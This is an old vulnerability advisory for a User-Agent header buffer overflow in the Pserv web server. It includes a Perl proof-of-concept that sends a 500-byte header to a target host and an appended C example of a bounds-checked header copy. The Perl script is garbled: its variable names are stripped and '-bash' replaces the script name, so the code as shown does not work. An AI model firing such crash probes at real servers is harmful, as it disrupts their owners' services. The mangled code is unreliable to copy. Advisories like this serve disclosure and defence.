Pserv User-Agent HTTP Header Buffer Overflow

Published: 2002-11-30
Updated: 2002-11-30
Severity: Medium
Threat level: Remote denial of service
Error type: Boundary check error
Exploitation method: Server mode
BUGTRAQ ID: 6286

Affected systems

Pserv Pserv 2.0 beta 5

Detailed description

Pico Server is a free web server program.

If an attacker submits an HTTP request with an overlong User-Agent header string, the buffer is allocated incorrectly during processing, which can corrupt the stack and overflow the buffer; arbitrary code execution may be possible.

Test code

    GET / HTTP/1.0
    User-Agent: [buffer]

    #!/usr/bin/perl -w
    use IO::Socket;
    = "Pserv 2.0 Beta 1, 2, 3, 5";
    unless (@ARGV == 1) {
        print "\n By Sapient2003\n";
        die "usage: -bash <host to exploit>\n";
    }
    print "\n By Sapient2003\n";
    = "A" x 500;
    = "GET / HTTP/1.0\nUser-Agent: \n\n";
    = "GET / HTTP/1.0\n\n";
    = "GET / HTTP/1.\n\n";
    = IO::Socket::INET->new(
        PeerAddr => [0],
        PeerPort => 80,
        Proto => "tcp",
    ) or die "Can't find host [0]\n";
    print ;
    print "Attempted to exploit User-Agent HTTP Header\n";
    close();
    = IO::Socket::INET->new(
        PeerAddr => [0],
        PeerPort => 80,
        Proto => "tcp",
    ) or die "Can't find host [0]\n";
    print ;
    print "Attempted to exploit HTTP Request Parsing\n";
    close();

Solution

None yet.

Related information

"Matthew Murphy" <mattmurphy@kc.rr.com>.
Reference: http://marc.theaimsgroup.com/?l=bugtraq&m=103884399831294&w=2
Related homepage: http://pserv.sourceforge.net/
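The boundary check that this class of bug lacks, as an added example; it is not Pserv's code and not part of the original advisory. The names get_user_agent and check_ua_of_length and the 256-byte limit UA_MAX are assumptions made for illustration; the advisory does not state Pserv's real buffer size.

```c
#include <stddef.h>
#include <string.h>
#include <strings.h>

#define UA_MAX 256  /* assumed limit; the real buffer size is not on the page */

enum ua_status { UA_OK = 0, UA_MISSING = -1, UA_TOO_LONG = -2 };

/* Hypothetical helper: copy the User-Agent value from a raw HTTP request
 * into out[outlen], refusing values that do not fit. The unsafe pattern is
 * strcpy() or sscanf("%s") of the header value into a fixed-size stack
 * array without measuring it first. */
enum ua_status get_user_agent(const char *req, char *out, size_t outlen)
{
    static const char name[] = "User-Agent:";
    const char *line = req;

    if (outlen == 0) return UA_TOO_LONG;
    out[0] = '\0';

    /* Skip the request line, then walk header lines until the blank line. */
    while ((line = strchr(line, '\n')) != NULL) {
        line++;
        if (*line == '\n' || *line == '\r' || *line == '\0')
            return UA_MISSING;              /* end of headers */
        if (strncasecmp(line, name, sizeof name - 1) != 0)
            continue;

        const char *val = line + sizeof name - 1;
        while (*val == ' ' || *val == '\t') val++;
        size_t len = strcspn(val, "\r\n");  /* measure before copying */
        if (len >= outlen)
            return UA_TOO_LONG;             /* caller rejects and closes */
        memcpy(out, val, len);
        out[len] = '\0';
        return UA_OK;
    }
    return UA_MISSING;
}

/* Constructed sample input: a request whose User-Agent is n bytes of 'A'. */
enum ua_status check_ua_of_length(size_t n)
{
    char req[1024] = "GET / HTTP/1.0\nUser-Agent: ", out[UA_MAX];
    size_t off = strlen(req);
    if (n > sizeof req - off - 3) return UA_TOO_LONG;
    memset(req + off, 'A', n);
    memcpy(req + off + n, "\n\n", 3);
    return get_user_agent(req, out, sizeof out);
}
```

A server using a check like this answers an oversized header with an error response and closes the connection, so the 500-byte value from the test request is rejected before any copy takes place.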